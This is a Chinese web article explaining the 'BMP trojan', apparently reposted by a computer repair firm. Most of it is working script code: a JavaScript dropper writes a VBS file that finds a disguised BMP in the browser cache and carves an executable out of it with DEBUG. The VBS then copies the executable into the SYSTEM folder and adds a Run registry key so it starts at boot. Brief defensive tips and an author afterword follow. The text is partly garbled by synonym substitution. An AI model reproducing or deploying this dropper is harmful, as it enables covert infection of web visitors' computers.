详解BMP木马

  st.WriteLine(' Lt.Close');
  st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
  st.WriteLine(' On Error Resume Next ');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');
  st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
  st.WriteLine(' end if');
  st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
  st.WriteLine(' For Each SubFolder In Folder.SubFolders');
  st.WriteLine(' SearchBMPFile SubFolder,fname');
  st.WriteLine(' Next');
  st.WriteLine(' End If');
  st.WriteLine('End Function');
  st.Close();
  }
  setTimeout('docsave()',1000);
  把该剧本生存为"js.js",在网页中拔出:
  该剧本主要会在当地机器的SYSTEM目次下天生一个“S.VBS”文件，该剧本文件会在下次开机时自动运行。主要用于从暂时目次中找出mybmp[1].bmp文件。
  “S.VBS”文件主要内容如下:
  Option Explicit
  Dim FSO,WSH,CACHE,str
  Set FSO = CreateObject("Scripting.FileSystemObject")
  Set WSH = CreateObject("WScript.Shell")
  CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
  wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
  wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
  SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
  WScript.Quit()
  Function SearchBMPFile(Folder,fname)
  Dim SubFolder,File,Lt,tmp,winsys
  '从暂时文件夹中查找目标BMP图片
  str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
  if FSO.FileExists(str) then
  tmp=fso.GetSpecialFolder(2) & "\"
  winsys=fso.GetSpecialFolder(1) & "\"
  set File=FSO.GetFile(str)
  File.Copy(tmp & "tmp.dat")
  File.Delete
  '天生一个DEBUG剧本
  set Lt=FSO.CreateTextFile(tmp & "tmp.in")
  Lt.WriteLine("rbx")
  Lt.WriteLine("0")
  Lt.WriteLine("rcx")
  '上面一行的1000是十六进制，换回十进制是4096(该数字是你的EXE文件的大小)
  Lt.WriteLine("1000")
  Lt.WriteLine("w136")
  Lt.WriteLine("q")
  Lt.Close
  WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
  On Error Resume Next
  FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
  FSO.GetFile(tmp & "tmp.dat").Delete
  FSO.GetFile(tmp & "tmp.in").Delete
  FSO.GetFile(tmp & "tmp.out").Delete
  end if
  If Folder.SubFolders.Count <> 0 Then
  For Each SubFolder In Folder.SubFolders
  SearchBMPFile SubFolder,fname
  Next
  End If
  End Function
  这个剧本会找出在暂时文件夹中的bmp文件,并天生一个DEBUG的剧本,运行时会自动从BMP文件54字节处读去你指定大小的数据,并把它生存到tmp.dat中.后面的剧本再把它复制到SYSTEM的目次下.这个被还原的EXE文件会在下次重起的时候运行.这便是BMP木马的根本完成历程.
  详细剧本代码请参http://hotsky.363.net
  防备要领:
  最简单,删除或改名wscrpit.exe文件和DEBUG 文件;
  安置有用的杀毒软件,由于这些剧本有很多多少杀毒软件已经可以查出来了.
  在条件容许的情况下,安置WIN2K SP3,尽量制止去一些不名来历的网站.
  -----------------------------------------------------------------------------------------------------------------------------
  后记:
  近来有些网友总是在评论辩论我们的题目,我们承认,我们不是妙手,写一个木马也绝对不是什么了不起的事变,这是究竟,大家也可以写木马,但我们要增补几点:
  1)我们不止会用DELPHI,还会用C++BUILDER(便是不喜好VC,没办法).
  2)广外女生服务端没有用任何VCL组件.
  3)我们只是初学者.没有什么了不起.
  但是我们想大家知道,会用木马也不是什么了不起的事变.妙手更加不会在网页中参加这些代码来害人,我们这个网站主要目标是让有兴味的朋友,另有初学者能学到些有用的东西,并不是要当什么PK妙手,每个人都有初学的阶段,我也有拿着NETSPY到处抓弄他人的日子,网络是假造天下,我们在这里面除了聊天,网络游戏等娱乐之外,学点东西也是应该的,我们也努力去做好,大家的批评我们是可以担当的,希望大家能明确我们,做好不是想象那么容易的.
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：